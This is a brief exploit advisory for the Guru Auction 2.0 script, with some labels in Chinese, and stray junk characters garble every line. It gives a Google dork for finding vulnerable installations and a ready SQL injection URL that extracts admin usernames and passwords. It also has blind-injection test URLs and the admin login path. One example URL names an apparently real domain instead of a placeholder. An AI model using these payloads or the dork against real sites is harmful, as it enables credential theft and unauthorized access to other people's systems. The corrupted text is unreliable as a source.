Guru Auction 2.0 Multiple SQL Injection Vulnerabilities! t5 e9 _/ ~1 r! u
, R$ }0 d' M! z8 Y% P( `作者 : v3n0m
* i% [1 M# ]- K" M. I5 Q' x应用 : Guru Auction 2.0
& Y3 d" N9 x2 Y" @ [5 D9 r! fPrice : $49
* O; H m: C S/ o6 vVendor : http://www.guruscript.com/; k1 M- c$ N# t0 b% o
Google Dork : inurl:subcat.php?cate_id=( r/ x% z' }( b7 Y: k# d/ P
+ E: R6 p: l% R# J* Z: g; v) ESQLi p0c:
8 h7 I- m$ ?( V# N, v~~~~~~~~~~
, q2 D. w( P: ]& Fhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
( y) W; w# Z# j) g4 E7 a % p/ c/ A' Y: _8 S: ]; k
: U) ?/ w" l2 d5 Q盲注 p0c:+ f3 Q$ o4 G/ m- Q* l* c
~~~~~~~~~~8 R6 {& F: n" Z6 {
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
- k: x# h0 k, ]http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false, v+ U3 E$ o" j( e9 A
9 K) U4 ~; g+ ^
管理登录入口:4 M$ F' W- D4 k) @( q! R
~~~~~~~~~~ l: _; T/ G8 W: s( `. g. `" g
http://domain.tld/[path]/admin/2 `5 X) m- _$ `7 _( s8 p2 x
|